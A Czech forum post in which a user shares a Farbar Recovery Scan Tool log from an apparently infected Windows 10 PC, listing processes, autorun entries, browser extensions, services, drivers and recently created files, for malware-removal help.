Omlouvám se, tady jsou poslední logy
Díky za včasnou odpověď
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28.09.2018
Ran by Martin (administrator) on DESKTOP-VBSMI5O (12-01-2019 00:00:54)
Running from C:\Users\ulol\Desktop
Loaded Profiles: Martin (Available Profiles: defaultuser0 & Martin)
Platform: Windows 10 Home Version 1803 17134.523 (X64) Language: Čeština (Česko)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool:
http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1812.3-0\MsMpEng.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
() C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4926664 2016-02-26] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [464608 2014-09-08] ()
HKLM-x32\...\Run: [NetTime] => C:\Program Files (x86)\NetTime\NetTime.exe [772096 2012-05-12] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-04] (Advanced Micro Devices, Inc.)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe [160824 2017-05-24] (BlueStack Systems, Inc.)
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{430db6d2-4242-4c4a-bd0e-6f4a3369534d}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{942faac3-3e9a-472d-9cf4-c30e16d1a17b}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2018-11-22] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2018-12-21] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2018-07-17] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2018-12-21] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
FireFox:
========
FF DefaultProfile: fcg8p7lh.default
FF ProfilePath: C:\Users\ulol\AppData\Roaming\Mozilla\Firefox\Profiles\fcg8p7lh.default [2019-01-12]
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-07-17] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2018-07-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-20] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-20] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-12-04] (Adobe Systems Inc.)
Chrome:
=======
CHR HomePage: Default -> hxxp://
www.seznam.cz/
CHR StartupUrls: Default -> "hxxps://
www.google.com/","hxxps://www.google.com/"
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default [2019-01-12]
CHR Extension: (Překladač Google) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-10-20]
CHR Extension: (Dokumenty) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-13]
CHR Extension: (Disk Google) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-01]
CHR Extension: (CLONE, BOUNTY HUNTER, STORM TROOPER) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\bimnpejnapnbhiphakfmkhnnaoemofbe [2017-02-01]
CHR Extension: (YouTube) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-01]
CHR Extension: (Dokumenty Google offline) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-23]
CHR Extension: (AdBlock) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-12-12]
CHR Extension: (Bandzone Downloader) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdolellaicjnehmfidkjkkehmkkapngp [2017-11-09]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
CHR Extension: (Gmail) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-01]
CHR Extension: (Chrome Media Router) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-12-19]
CHR Profile: C:\Users\ulol\AppData\Local\Google\Chrome\User Data\System Profile [2017-11-18]
CHR HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [387128 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [406584 2017-05-24] (BlueStack Systems, Inc.)
S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8522536 2018-12-10] (Microsoft Corporation)
S3 GoogleChromeElevationService; C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [443872 2018-12-12] (Google Inc.)
S2 HitmanProScheduler; C:\Program Files\HitmanPro\hmpsched.exe [136512 2019-01-11] (SurfRight B.V.)
S2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-11-19] () [File not signed]
S2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [319096 2017-05-18] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6347056 2018-09-19] (Malwarebytes)
S2 NetTimeSvc; C:\Program Files (x86)\NetTime\NetTimeService.exe [473088 2012-05-12] () [File not signed]
S2 Samsung Printer Dianostics Service; C:\WINDOWS\SysWOW64\\spdsvc.exe [499000 2016-07-17] ()
S4 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
S2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [256120 2016-02-01] (Synaptics Incorporated)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\NisSrv.exe [3880120 2018-12-11] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MsMpEng.exe [114208 2018-12-11] (Microsoft Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [23240 2016-02-26] (Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [79736 2017-09-20] (Advanced Micro Devices, Inc.)
S3 Andbus; C:\WINDOWS\System32\drivers\lgandbus64.sys [19456 2012-03-02] (LG Electronics Inc.)
S3 AndDiag; C:\WINDOWS\System32\drivers\lganddiag64.sys [27648 2012-03-02] (LG Electronics Inc.)
S3 AndGps; C:\WINDOWS\System32\drivers\lgandgps64.sys [27136 2012-03-02] (LG Electronics Inc.)
S3 AndNetDiag2; C:\WINDOWS\System32\drivers\lgandnetdiag264.sys [30720 2015-01-26] (LG Electronics Inc.)
S3 AndNetGps; C:\WINDOWS\System32\drivers\lgandnetgps64.sys [29184 2015-01-21] (LG Electronics Inc.)
S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-05-24] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-05-22] (Bluestack System Inc. )
S3 dg_ssudbus; C:\WINDOWS\System32\drivers\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 edrsensor; C:\WINDOWS\System32\DRIVERS\edrsensor.sys [294000 2018-10-09] (BitDefender S.R.L. Bucharest, ROMANIA)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2018-11-19] (Huawei Technologies Co., Ltd.)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2019-01-11] ()
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-11-19] (Huawei Technologies Co., Ltd.)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [261032 2019-01-11] (Malwarebytes)
S3 Microsoft_Bluetooth_AvrcpTransport; C:\WINDOWS\system32\DRIVERS\Microsoft.Bluetooth.AvrcpTransport.sys [46592 2018-04-12] (Microsoft Corporation)
R3 RadioHIDMini; C:\WINDOWS\System32\drivers\RadioHIDMini.sys [32168 2015-07-16] (Windows (R) Win 7 DDK provider)
S3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2000-01-01] (Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2000-01-01] (Realsil Semiconductor Corporation)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [33960 2000-01-01] (Synaptics Incorporated)
S3 ssudcdf; C:\WINDOWS\System32\drivers\ssudcdf.sys [36608 2014-01-22] (DEVGURU Co., LTD.(
www.devguru.co.kr))
S3 ssuddmgr; C:\WINDOWS\System32\drivers\ssuddmgr.sys [206080 2014-01-22] (DEVGURU Co., LTD.(
www.devguru.co.kr))
S3 ssudobex; C:\WINDOWS\System32\drivers\ssudobex.sys [206080 2014-01-22] (DEVGURU Co., LTD.(
www.devguru.co.kr))
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64640 2016-07-22] (QUALCOMM Incorporated)
S3 ssudrmnet; C:\WINDOWS\System32\drivers\ssudrmnet.sys [70400 2014-01-22] (DEVGURU Co., LTD.)
S3 ssudserd; C:\WINDOWS\System32\drivers\ssudserd.sys [206080 2014-01-22] (DEVGURU Co., LTD.(
www.devguru.co.kr))
S3 ss_conn_usb_driver; C:\WINDOWS\System32\Drivers\ss_conn_usb_driver.sys [26368 2014-01-22] (DEVGURU Co., LTD.)
S3 usbbus; C:\WINDOWS\System32\drivers\lgx64bus.sys [17920 2014-11-17] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\System32\drivers\lgx64diag.sys [28160 2014-11-21] (LG Electronics Inc.)
S3 UsbGps; C:\WINDOWS\System32\drivers\lgx64gps.sys [27136 2014-11-17] (LG Electronics Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46680 2018-12-11] (Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [330936 2018-12-11] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [62136 2018-12-11] (Microsoft Corporation)
U2 bddci; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-01-11 23:59 - 2019-01-11 23:59 - 000261032 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-01-11 23:24 - 2019-01-11 23:24 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
2019-01-11 23:07 - 2019-01-11 23:35 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2019-01-11 23:01 - 2019-01-11 23:02 - 000007593 _____ C:\Users\ulol\AppData\Local\Resmon.ResmonCfg
2019-01-11 22:44 - 2019-01-11 22:44 - 000025200 _____ C:\Users\ulol\Desktop\frst.rar
2019-01-11 20:12 - 2019-01-11 20:12 - 000055127 _____ C:\Users\ulol\Desktop\logy.rar
2019-01-11 20:10 - 2019-01-11 20:12 - 000049304 _____ C:\Users\ulol\Desktop\Addition.txt
2019-01-11 20:07 - 2019-01-12 00:02 - 000015218 _____ C:\Users\ulol\Desktop\FRST.txt
2019-01-11 19:40 - 2019-01-11 19:34 - 000000000 ____D C:\Users\ulol\Desktop\logy
2019-01-11 19:33 - 2019-01-12 00:00 - 000000000 ____D C:\FRST
2019-01-11 19:19 - 2019-01-11 19:19 - 002414080 _____ (Farbar) C:\Users\ulol\Desktop\FRST64.exe
2019-01-11 19:04 - 2019-01-11 19:04 - 000000000 ____D C:\Users\ulol\Desktop\cce_2.5.242177.201_x32
2019-01-11 14:17 - 2019-01-11 14:17 - 000000000 ____D C:\Users\ulol\AppData\Roaming\adaware
2019-01-11 14:17 - 2019-01-11 14:17 - 000000000 ____D C:\Users\ulol\AppData\Local\AdAwareDesktop
2019-01-11 14:13 - 2019-01-11 14:13 - 000000000 ____D C:\Program Files (x86)\adaware
2019-01-11 14:12 - 2019-01-11 14:12 - 000000000 ____D C:\Users\ulol\AppData\Local\AdAwareUpdater
2019-01-11 14:12 - 2019-01-11 14:12 - 000000000 ____D C:\Program Files\Common Files\adaware
2019-01-11 14:11 - 2019-01-11 14:11 - 000000000 ____D C:\ProgramData\adaware
2019-01-11 14:10 - 2019-01-11 23:24 - 000000000 ____D C:\ProgramData\HitmanPro
2019-01-11 14:10 - 2019-01-11 14:10 - 000001958 _____ C:\Users\Public\Desktop\HitmanPro.lnk
2019-01-11 14:10 - 2019-01-11 14:10 - 000000000 ____D C:\Program Files\HitmanPro
2019-01-11 13:46 - 2019-01-11 23:59 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2019-01-11 13:45 - 2019-01-12 00:00 - 000891156 _____ C:\WINDOWS\ntbtlog.txt
2019-01-11 13:34 - 2019-01-11 13:34 - 000000080 ___SH C:\bootTel.dat
2019-01-11 13:25 - 2019-01-11 13:55 - 000000000 ____D C:\AdwCleaner
2019-01-11 13:25 - 2019-01-11 13:25 - 007320272 _____ (Malwarebytes) C:\Users\ulol\Desktop\adwcleaner_7.2.6.0.exe
2019-01-11 11:32 - 2019-01-11 12:13 - 373444054 _____ C:\Users\ulol\Desktop\Vikings 5x17 - S05E17 CZ titulky v obraze.avi
2019-01-11 11:20 - 2019-01-11 11:20 - 006161408 _____ C:\Users\ulol\AppData\Local\dump007.dat
2019-01-11 11:19 - 2019-01-11 11:19 - 000003688 _____ C:\WINDOWS\System32\Tasks\kuaejfar
2019-01-11 11:19 - 2019-01-11 11:19 - 000003470 _____ C:\WINDOWS\System32\Tasks\gcknyzn
2019-01-11 11:19 - 2019-01-11 11:19 - 000000009 _____ C:\Users\ulol\rstr2.ini
2019-01-10 17:53 - 2019-01-10 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-10 17:53 - 2018-12-04 08:09 - 000152688 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-01-10 17:46 - 2019-01-10 17:46 - 000000008 _____ C:\ProgramData\ts.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ C:\ProgramData\lock.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ C:\ProgramData\irw.atsd
2019-01-10 17:29 - 2019-01-10 17:29 - 000003604 _____ C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
2019-01-10 17:29 - 2019-01-10 17:29 - 000000004 _____ C:\ProgramData\ext.dat
2019-01-10 17:29 - 2019-01-10 17:29 - 000000003 _____ C:\Users\ulol\AppData\Local\wbem.ini
2019-01-10 17:28 - 2019-01-10 17:22 - 000000000 ____D C:\Program Files (x86)\DCOL
2019-01-10 17:26 - 2019-01-10 17:26 - 000000000 ____D C:\Users\ulol\AppData\LocalLow\MAL
2019-01-10 17:12 - 2019-01-10 17:12 - 000057640 _____ C:\ProgramData\agent.uninstall.1547136713.bdinstall.v2.bin
2019-01-09 12:59 - 2019-01-01 14:46 - 012710912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-01-09 12:59 - 2019-01-01 14:43 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-01-09 12:59 - 2019-01-01 14:20 - 011902976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-01-09 12:59 - 2019-01-01 08:14 - 001221432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-01-09 12:59 - 2019-01-01 08:14 - 001029944 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-01-09 12:59 - 2019-01-01 08:14 - 000566568 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2019-01-09 12:59 - 2019-01-01 08:13 - 003292152 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-01-09 12:59 - 2019-01-01 08:13 - 001363536 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 009084216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-01-09 12:59 - 2019-01-01 08:12 - 007520104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002765344 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002465792 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002421288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-01-09 12:59 - 2019-01-01 08:12 - 000268304 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2019-01-09 12:59 - 2019-01-01 07:55 - 025856512 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-01-09 12:59 - 2019-01-01 07:50 - 022715392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-01-09 12:59 - 2019-01-01 07:50 - 004383744 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-01-09 12:59 - 2019-01-01 07:47 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-01-09 12:59 - 2019-01-01 07:47 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2019-01-09 12:59 - 2019-01-01 07:45 - 007573504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-01-09 12:59 - 2019-01-01 07:45 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000662528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidprov.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.Workflow.dll
2019-01-09 12:59 - 2019-01-01 07:43 - 001805312 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 004939776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002247680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 001371136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 000717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2019-01-09 12:59 - 2019-01-01 07:41 - 001159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-01-09 12:59 - 2019-01-01 07:41 - 000505344 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 006571584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 002478664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 002253696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 001989040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2019-01-09 12:59 - 2019-01-01 07:29 - 022016512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-01-09 12:59 - 2019-01-01 07:22 - 019405312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-01-09 12:59 - 2019-01-01 07:16 - 005775872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-01-09 12:59 - 2019-01-01 07:15 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2019-01-09 12:59 - 2019-01-01 07:15 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-01-09 12:59 - 2019-01-01 07:14 - 004514816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-01-09 12:59 - 2019-01-01 07:13 - 001628160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-01-09 12:59 - 2019-01-01 07:12 - 000795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2019-01-09 12:59 - 2018-12-19 05:49 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-01-09 12:58 - 2019-01-01 14:50 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2019-01-09 12:58 - 2019-01-01 14:47 - 000225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowslivelogin.dll
2019-01-09 12:58 - 2019-01-01 14:45 - 000714752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2019-01-09 12:58 - 2019-01-01 14:45 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcredprov.dll
2019-01-09 12:58 - 2019-01-01 14:20 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windowslivelogin.dll
2019-01-09 12:58 - 2019-01-01 14:18 - 000500736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2019-01-09 12:58 - 2019-01-01 14:17 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcredprov.dll
2019-01-09 12:58 - 2019-01-01 08:14 - 001063224 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2019-01-09 12:58 - 2019-01-01 08:14 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-01-09 12:58 - 2019-01-01 08:14 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2019-01-09 12:58 - 2019-01-01 08:13 - 000709728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2019-01-09 12:58 - 2019-01-01 08:13 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-01-09 12:58 - 2019-01-01 08:13 - 000170808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
